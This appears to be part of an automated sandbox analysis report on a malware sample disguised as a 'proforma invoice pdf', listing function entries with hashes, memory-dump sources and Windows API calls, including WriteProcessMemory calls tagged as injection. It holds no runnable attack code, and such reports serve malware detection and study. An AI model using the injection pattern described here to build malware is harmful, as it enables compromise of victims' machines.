Instruction Fuzzy Hash: 1B211FB1C103089FDB24CFAAD844ADEFBF4AB89210F10852AE448A7640C7785945CFA1

Function 01081024 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3905504294.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1080000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4208010518e98a56f8174bd1b20683220d7566c4b329a369bf1335f27270dd54
Instruction ID: e46ec22f3df20383a9f8fa85331fcec180bf5a28a2b176408ac1df223f922d27
Opcode Fuzzy Hash: 4208010518e98a56f8174bd1b20683220d7566c4b329a369bf1335f27270dd54
Instruction Fuzzy Hash: 9521F2B5C04349EFDB20DF9AD844ADEBBF4FB48310F14841AE959A7200C375A955CFA1

Function 01081510 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3905504294.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1080000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59f53d22a2e7e9244c7cc7f2450dcaf90b422f146520a11b6dc8bb1293456281
Instruction ID: 3f8a0fc81fc69ddad709cf41bc0915f36f2b04e992250958713782a33883be54
Opcode Fuzzy Hash: 59f53d22a2e7e9244c7cc7f2450dcaf90b422f146520a11b6dc8bb1293456281
Instruction Fuzzy Hash: 4C21F2B6800249DFDB20CFAAD844ADEBBF4FB48310F10841AE959A7200C375AA55CFA1

Function 0112D3B7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3906666753.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_112d000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction ID: 71f0d1a504dd6e30b2c2d47f368c6f5738d33b2fc069c3b624b0c2ce4a77b951
Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction Fuzzy Hash: D911BE75504280DFDB0ACF54E5C4B55BF61FB44314F24C6AAD8494BA96C33AE41ACB91

Function 0112D207 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3906666753.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_112d000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a37c6801951d4ba7ad7433749c44e8efe01c680cd3f8f024970093133622734
Instruction ID: 19c4bdb74729a8e94680f04435d3d9a5c5e4142da6d5454caa4d0b946ff1105e
Opcode Fuzzy Hash: 8a37c6801951d4ba7ad7433749c44e8efe01c680cd3f8f024970093133622734
Instruction Fuzzy Hash: 0811DD76504284DFDB16CF54E5C4B16FF61FB85324F24C6AAD8490B646C33AD41ACBA2

Function 0112D02B Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3906666753.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_112d000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction ID: add30a386349b6c6e6e36cd13a5e6e9aa33bf512554185bcf7a1e2b06889284f
Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction Fuzzy Hash: 6511BB75504280DFDB1ACF54E5C0B15FFA1FB84314F28C6AAD8494B6A7C33AD45ACB62

Function 010812D8 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3905504294.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1080000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6f663e496e7dbb7421f065091e8733a52de260a5e51d2aabdd968b48ee8a07f
Instruction ID: 04638a6245ac3921d6f781fccd718cfa64226a78bc1c6f7cd7c6025dcf5de253
Opcode Fuzzy Hash: c6f663e496e7dbb7421f065091e8733a52de260a5e51d2aabdd968b48ee8a07f
Instruction Fuzzy Hash: D901DD35609346DFCB09AFA4D85055A7FB1EFC5210B14886AF5818F551CB35AC16C792

Function 01082C81 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3905504294.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1080000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9ffe88c3368b158d2c4cf95fef9193bf88ebe4993eba13d8a1fdc4d991a29fd
Instruction ID: c637f73a10372458e2401f1034f21ab2548418b16dd32c149c328f188f3439db
Opcode Fuzzy Hash: d9ffe88c3368b158d2c4cf95fef9193bf88ebe4993eba13d8a1fdc4d991a29fd
Instruction Fuzzy Hash: 20018F7620E3D14FCB065F38A8610D57FB2AF9661432941DBD0C0CB2D3D665895BC3A2

Function 0112D113 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3906666753.000000000112D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_112d000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf1951b32a6512454e7b897e8db3e2e33714c350ee0490917150b492223a5a90
Instruction ID: 6fd32eae0167edd4a255cd0a6cfb9187990296ad8ced9f197b6b727d9cc1b802
Opcode Fuzzy Hash: bf1951b32a6512454e7b897e8db3e2e33714c350ee0490917150b492223a5a90
Instruction Fuzzy Hash: C611BB75504280DFDB0ACF14E9C0B15BFA2FB84318F24C6A9D8494BA92C33AD45ACB52

Function 01081184 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3905504294.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1080000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76b84f659e95dcc5311d9cb47ab3978377b3d77bdedec7519f8948a9f985947d
Instruction ID: 904ef95b76aa3068238aa0cb5aaa0dfd954d00319596a7931e3163fc4f19f844
Opcode Fuzzy Hash: 76b84f659e95dcc5311d9cb47ab3978377b3d77bdedec7519f8948a9f985947d
Instruction Fuzzy Hash: C111DDB5C142589FDB20DFAAD844A9EFBF8FB48210F10856AE458B7600C779A904CFA5

Function 0111D819 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3906342002.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_111d000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 682fa0c5a072ac2c5045c733be932473ba8cbf712e43504717c54b37e2a6f1ac
Instruction ID: 0d59c2e38a1665facae1b2839c44149955d88a9c4638d1c875e06bc3e50cae08
Opcode Fuzzy Hash: 682fa0c5a072ac2c5045c733be932473ba8cbf712e43504717c54b37e2a6f1ac
Instruction Fuzzy Hash: 7401A771504740EAEF285BA9EC88766FB98DF41660F18856AED0D1E29BC379D440CAB2

Function 01084F1C Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3905504294.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1080000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86dbe92c032e626a269b33dbfd0e7b51171182b2379d052044f4ebe7391e7d5a
Instruction ID: 5e651bd2313386fbec3dee290af6fcab22406798eb6b1661060dba244d4c5310
Opcode Fuzzy Hash: 86dbe92c032e626a269b33dbfd0e7b51171182b2379d052044f4ebe7391e7d5a
Instruction Fuzzy Hash: BF112A71804209DFEB14DF9AC44879EBFF1EF88314F24C069E4A8AB295C7748981CB94

Function 010852D7 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3905504294.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1080000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dc58fe2d7e641b4ecc8b97fb49d4a77b706ce8db0f45c7e7e227041cf6148e0
Instruction ID: 66977ac53dac4ede7dcd9bc021a88f770ec3729b0f1112e9d2a560baa160898a
Opcode Fuzzy Hash: 1dc58fe2d7e641b4ecc8b97fb49d4a77b706ce8db0f45c7e7e227041cf6148e0
Instruction Fuzzy Hash: 33F059317082102FC764717DAC55AEE33DDEBC6224F404479F149DB392CE50CC028391

Function 01081041 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3905504294.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1080000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3eaab8d79965316cb17553baf4aa94db898ab9f5e9176d81c0f712a4fe3cd4e
Instruction ID: 9222f5f396c9d3b021289a2d60733cd35564e3260f8ce9b074cfcd4ec678ead8
Opcode Fuzzy Hash: f3eaab8d79965316cb17553baf4aa94db898ab9f5e9176d81c0f712a4fe3cd4e
Instruction Fuzzy Hash: 1301F47660424A6FD706EF69DC0099ABFFAEFC4364704C0A6F894CB215DB7189168F60

Function 01081FB9 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3905504294.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1080000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da782fbda4c94dfe3bcc8263792f0b76e132028cb88eb003ba2696c3f06af80b
Instruction ID: c7405b4769753d2856be99dcb89c6d3e2bc9f1586dcb27cfa0b0e601d6eaaa22
Opcode Fuzzy Hash: da782fbda4c94dfe3bcc8263792f0b76e132028cb88eb003ba2696c3f06af80b
Instruction Fuzzy Hash: 0001083190420A8BDF00EBA4C954AFEBBF6AF98304F208425D981B7291EF355946CF61

Function 01081E88 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3905504294.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1080000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 781e6da174e4c26f7c0c99cda7b72efaa2195082eb437a62bee1dd65c0eedb35
Instruction ID: 8244ab724f1a32ab17804b482247778876ac4611113a704fb6e6ef55aa224d2a
Opcode Fuzzy Hash: 781e6da174e4c26f7c0c99cda7b72efaa2195082eb437a62bee1dd65c0eedb35
Instruction Fuzzy Hash: FE01AF319092559FCB22DFACE8C49EAFFB1EF06310B6545BAE5C5C7592C330884A8B11

Function 01084F28 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3905504294.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1080000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91e759e62faa5a614216f9859599633cdbc70343ffa12477344294ff53204202
Instruction ID: a49913fa67d1d7094494aead16a0a139adad99d785e064ee9c94daadd7cac11c
Opcode Fuzzy Hash: 91e759e62faa5a614216f9859599633cdbc70343ffa12477344294ff53204202
Instruction Fuzzy Hash: AB014070904209DFEB14DF9AC4487DEBEF5FF88324F24C069E968AB295C7708980CB94

Function 0111D818 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3906342002.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_111d000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e969472f71fa1a6bda2b0b61edffdcbdfe3ee2582508d28919f102cbd9a89a8f
Instruction ID: 4358834759af090ff2a1c7aa1a292dd4e8873e877848715574c2138bfa2ce92a
Opcode Fuzzy Hash: e969472f71fa1a6bda2b0b61edffdcbdfe3ee2582508d28919f102cbd9a89a8f
Instruction Fuzzy Hash: 4BF0C271404340AEEB248B1AEC88B62FFD8EB41724F18C15AED0C0F287C3799840CAB1

Function 010852E8 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3905504294.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1080000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04a36322baaa132ff55d004041cb542881f21fb571a50857f75870145093b307
Instruction ID: 0567a3f27c0c50a0ebef00f178901fca95ce081b23ed84f333cdd816ff9437b3
Opcode Fuzzy Hash: 04a36322baaa132ff55d004041cb542881f21fb571a50857f75870145093b307
Instruction Fuzzy Hash: 53F0E5317141101FCBA4B17EA858A7E72DEEBCA264F504479E14AD7391DD50CC018351

Function 01082D70 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3905504294.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1080000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 017edb4e35e457a9c2b798f9d5ee811de436a9c92f706a6ef46a285847bf3047
Instruction ID: 2bd6e6530a1ab02aebb4c88a4749673c9ed08c77a101f097cc0bc80d4001fd53
Opcode Fuzzy Hash: 017edb4e35e457a9c2b798f9d5ee811de436a9c92f706a6ef46a285847bf3047
Instruction Fuzzy Hash: 70F0E2323543014FC302AE7AE880865BBF9FFCAA2432440B9D089CB252CA3298078791

Function 010828E1 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3905504294.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1080000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e82302abfc881eefc50943f21effbcd4d06887c6f7335709773af4c9f59cc86c
Instruction ID: a9785c3992b5ad8893420448b133de949f9437336b4b35ee27021cf27fb95567
Opcode Fuzzy Hash: e82302abfc881eefc50943f21effbcd4d06887c6f7335709773af4c9f59cc86c
Instruction Fuzzy Hash: E2F0583610520BAFCF019FA4DC009967BB9EF957607248056F9808B141E736D866DBA1

Function 010815C0 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3905504294.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1080000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dbfcb9169681030859d027bab5fdde9294209e51a1d588a3c9d8d22e203bcd5
Instruction ID: 969f5ae0674b348fb3c89237007206214237593821eb031b31aa072713739336
Opcode Fuzzy Hash: 0dbfcb9169681030859d027bab5fdde9294209e51a1d588a3c9d8d22e203bcd5
Instruction Fuzzy Hash: 0AF08CB9D0220AEFCB09EFB0E9504ADBBB5FB5220072081AAD845D7296D7311E06DB11

Function 01082E30 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3905504294.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1080000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea1719cada44aa34f1da50073528dd3c7ecb122a00825d3791ce603a30fa0090
Instruction ID: 7f8b029c07720bca63c93f158d9a3cbe092be4a58d57e906649dbc3b6de87feb
Opcode Fuzzy Hash: ea1719cada44aa34f1da50073528dd3c7ecb122a00825d3791ce603a30fa0090
Instruction Fuzzy Hash: E8E092312097528FCB36DF78E410585B7F4BF1AB2030405ABD4D1CB242DB35E90ACB96

Function 010813A4 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3905504294.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1080000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afd044509fee2c30659548d956cded2061aaada23197e295f2ce16352c15350d
Instruction ID: e22e6c313fa062d1c28bb82ad176de77a76fd4063370622b848e44a2a225d665
Opcode Fuzzy Hash: afd044509fee2c30659548d956cded2061aaada23197e295f2ce16352c15350d
Instruction Fuzzy Hash: 81E08C30308B188B8A39FE6CD0041AAB3F8FB59B10300096EE4D6C3640CBA0F804C78E

Function 010815D0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3905504294.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1080000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5eb8d69e3c6813edc4ed34a90984e0a8bb20e01a4a272b30c49883b0a196ecb
Instruction ID: 91f9811cfde34427141feda309ad8ff1332e93a863b3a927cfbda5508e2ec93a
Opcode Fuzzy Hash: f5eb8d69e3c6813edc4ed34a90984e0a8bb20e01a4a272b30c49883b0a196ecb
Instruction Fuzzy Hash: FDE08679D02209EFCB01FFB5E55045DB7B9FB44204B1041A9DC04A3348DB326F00EB55

Function 010813C0 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3905504294.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1080000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cd4cda269139d6d4512aeb535c3b5a6443033deba08d72e48691b32b85c63a7
Instruction ID: e97ea0ed985540610d6563bd03b397f520c72ec5b16a88ef528bed35e1a2a5e0
Opcode Fuzzy Hash: 4cd4cda269139d6d4512aeb535c3b5a6443033deba08d72e48691b32b85c63a7
Instruction Fuzzy Hash: 85C002705056018BDF149F5995481653AD4FB55318B304A4D609949192C776C547D7D1

Function 01082E10 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3905504294.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1080000_proforma invoice pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d0b30cd025fc46033d8e458be782a6f13a4d73844c765268b06cafa1eeda83d
Instruction ID: 64c5fef55b0c6524c6fe87538ea0a402a8f06c15c7d1068881eabdf45ffb77bf
Opcode Fuzzy Hash: 6d0b30cd025fc46033d8e458be782a6f13a4d73844c765268b06cafa1eeda83d
Instruction Fuzzy Hash: AAC04C2094E1D21EE707A7388C329C53F721E8301430D90F6D1D09B9E7D51C4457D612

Analysis Process: wTyVrj.exePID: 6668, Parent PID: 932COMMON

Execution Graph

Execution Coverage:	7.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	56
Total number of Limit Nodes:	4

Executed Functions

Function 04E9FAC0 Relevance: 1.7, APIs: 1, Instructions: 245
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04E9FCFE

Memory Dump Source

Source File: 0000000B.00000002.1542529120.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e90000_wTyVrj.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 575eea9ebaa5a921d945b6df41e138d5ddba9b65819e3afb50b9a12bc75fa67f
Instruction ID: 3a0939df4f8646cfedac4d6dbf1f29e041e0e1524e2706f8a3e3b78e092999bb
Opcode Fuzzy Hash: 575eea9ebaa5a921d945b6df41e138d5ddba9b65819e3afb50b9a12bc75fa67f
Instruction Fuzzy Hash: 25912871D003199FEF24CFA9C8517EDBBF2AF48318F148569E818E7290DB74A985CB91

Function 04E9FAC8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04E9FCFE

Memory Dump Source

Source File: 0000000B.00000002.1542529120.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e90000_wTyVrj.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 471add87652b56bdbca8e878680ac83e7c508c86a8316041788fbb0b530ab05d
Instruction ID: b38c91c35751a43476a0f564f54f8564bf26a1159c726a6d231a382f0ce5d7cb
Opcode Fuzzy Hash: 471add87652b56bdbca8e878680ac83e7c508c86a8316041788fbb0b530ab05d
Instruction Fuzzy Hash: 7D912971D003199FEF24CF69C8517EDBBF2AF48318F148569E818E6290DB74A985CB91

Function 0485BB40 Relevance: 1.7, APIs: 1, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0485BDA6

Memory Dump Source

Source File: 0000000B.00000002.1541023404.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4850000_wTyVrj.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 5a44ae18c3a7c86b4c6703b973563a30ceb3bea3ed3fc902146e76a9b7fb4484
Instruction ID: 324222209d24b123218d481b9467ad6260d142ce5fe4aa182838ebe5940d0f8f
Opcode Fuzzy Hash: 5a44ae18c3a7c86b4c6703b973563a30ceb3bea3ed3fc902146e76a9b7fb4484
Instruction Fuzzy Hash: 5381F370A00B058FD724DF69D44079ABBF1FF88304F108A2AD89ADBA60DB75F945CB95

Function 04854514 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 048559C9

Memory Dump Source

Source File: 0000000B.00000002.1541023404.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4850000_wTyVrj.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 8d5f3367bb2730f28312a81e9e5c101563c1a98ef55bda937e3eef9bd3a6aab4
Instruction ID: e89845e6a35d10e72c30eba53b152c5673b00256af7974048685dcca1b965a2e
Opcode Fuzzy Hash: 8d5f3367bb2730f28312a81e9e5c101563c1a98ef55bda937e3eef9bd3a6aab4
Instruction Fuzzy Hash: C741F270C0071CDFEB25CFA9C884B8DBBB5BF49304F20855AD408AB255D7756946CF90

Function 0485590C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 048559C9

Memory Dump Source

Source File: 0000000B.00000002.1541023404.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4850000_wTyVrj.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 43f1f855b0026afb58576c7b07ad54823217e5533422382ea93c5382eadc9b62
Instruction ID: b4c49ce020162f72753716eea61a437b2e718df2d9cb35d3deeb946b1c703def
Opcode Fuzzy Hash: 43f1f855b0026afb58576c7b07ad54823217e5533422382ea93c5382eadc9b62
Instruction Fuzzy Hash: 1741F171C00719CFEB25CFA9C884BCDBBB5BF48304F20856AD408AB264DB75694ACF50

Function 04E9F838 Relevance: 1.6, APIs: 1, Instructions: 71
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04E9F8D0

Memory Dump Source

Source File: 0000000B.00000002.1542529120.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e90000_wTyVrj.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 9eb88962a718d1d965d0c0386baade85b6f36e3f1af52e2cee5b5a1e6d52d4e2
Instruction ID: 59acbc785bb191ba665898c5d51cbef1c8df0aeb5d0f3f277adc167bf282318d
Opcode Fuzzy Hash: 9eb88962a718d1d965d0c0386baade85b6f36e3f1af52e2cee5b5a1e6d52d4e2
Instruction Fuzzy Hash: 29212471D003099FDB24CFA9C881BDEBBF1FF48310F10882AE918A7250C7799944CBA0

Function 04E9F840 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04E9F8D0

Memory Dump Source

Source File: 0000000B.00000002.1542529120.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e90000_wTyVrj.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 65902f3818f1b8b309a8a76c4a86b864353b6a2b096517289ffd89b650852fd6
Instruction ID: d4ebde5c7c35bf1f57848d1785f2429174f3f8a9cb7120bb5c9aa98df4e432d6
Opcode Fuzzy Hash: 65902f3818f1b8b309a8a76c4a86b864353b6a2b096517289ffd89b650852fd6
Instruction Fuzzy Hash: 50211571D003499FDB20CFA9C881BDEBBF5FF48314F10842AE958A7240C778A950CBA5

Function 04E9F928 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04E9F9B0

Memory Dump Source

Source File: 0000000B.00000002.1542529120.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4e90000_wTyVrj.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: cfd587cec21df173039726d36aa6de0bf171d7c92feabccc64585c579b6d5747
Instruction ID: 8d2bb1c966971959111f9f67cea72a769c6d3f0687a848ecc67e604fcfb4fc48
Opcode Fuzzy Hash: cfd587cec21df173039726d36aa6de0bf171d7c92feabccc64585c579b6d5747
Instruction Fuzzy Hash: B8211071C003499FDB24CFAAC881AEEBBF0FF48310F10842AE959A7250C7799940CBA1

Function 0485D6E0 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0485DFE6,?,?,?,?,?), ref: 0485E0A7

Memory Dump Source

Source File: 0000000B.00000002.1541023404.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4850000_wTyVrj.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 199a3ea1c85d7e24037e7070e963fac22d4c257666048f9dde5b554e83f02932
Instruction ID: 157141d7221b6b5ded62d2bb99f7394cbba84bde83e780e5ca253a56ae562108
Opcode Fuzzy Hash: 199a3ea1c85d7e24037e7070e963fac22d4c257666048f9dde5b554e83f02932
